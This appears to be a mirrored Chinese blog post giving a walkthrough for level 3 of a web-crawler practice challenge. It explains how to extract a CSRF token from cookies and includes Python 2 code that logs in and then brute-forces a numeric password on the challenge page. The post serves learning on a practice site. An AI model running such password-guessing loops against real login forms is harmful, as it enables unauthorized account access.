zoukankan      html  css  js  c++  java
  • 黑板客 -- 爬虫闯关 -- 关卡03

    爬虫闯关链接:


    1.  http://www.heibanke.com/accounts/login/?next=/lesson/crawler_ex02/


    2.  http://www.heibanke.com/accounts/login


    知识点:cookie & session , csrf , Web编程


    提示:此题有两个登录网址,登录结果完全不一样,第一次跳转进来时显示的是网址1,注册后跳转的是网址2,而只有最开始网址1用上一次注册的帐号密码登录才可以进入正确题目页面,与账单报表那个网页完全没有关系!!!每一次登录会动态赋予不同的CSRF凭证,存在cookie中,需要人为编程动态提取。


    参考代码:


    #!/usr/bin/env python
    # encoding: utf-8
    
    import requests
    import sys
    import re
    reload(sys)
    
    sys.setdefaultencoding("utf-8")
    
    csrf = ""
    username = "Peter"
    password = "112233"
    pw = "0"
    
    payload_login = {
    	"username":username,
    	"password":password,
    	"csrfmiddlewaretoken":csrf
    }
    
    payload_attack = {
    	"username":username,
    	"password":pw,
    	"csrfmiddlewaretoken":csrf
    }
    
    website_signUp = "http://www.heibanke.com/accounts/login"
    website_login = "http://www.heibanke.com/accounts/login/?next=/lesson/crawler_ex02/"
    
    s = requests.Session()
    s.get(website_signUp)
    csrf = s.cookies["csrftoken"]
    payload_login["csrfmiddlewaretoken"] = csrf
    s.post(website_login,data=payload_login)
    csrf = s.cookies["csrftoken"]
    
    s.post(website_login)
    payload_attack["csrfmiddlewaretoken"] = s.cookies["csrftoken"]
    for i in range(31):
    	payload_attack["password"] = str(i)
    	resp = s.post("http://www.heibanke.com/lesson/crawler_ex02/",data=payload_attack)
    	if resp.content.find(u"错误".decode("utf8")) == -1:
    		print "[+]FOUND : " + payload_attack["password"]
    		print "
    
    Text: 
    
    " + resp.content
    		break
    	else:
    		print payload_attack["password"]
    		continue
    
    


  • 相关阅读:
    CSS margin合并
    最大网络流
    js——this
    js——作用域和闭包
    CSS弹性(flexible)盒子
    CSS盒子模型
    修改html中button显示的文字
    远程唤醒UP Board
    UP Board 串口使用心得
    UP Board 网络设置一本通
  • 原文地址:https://www.cnblogs.com/csnd/p/12897057.html
Copyright © 2011-2022 走看看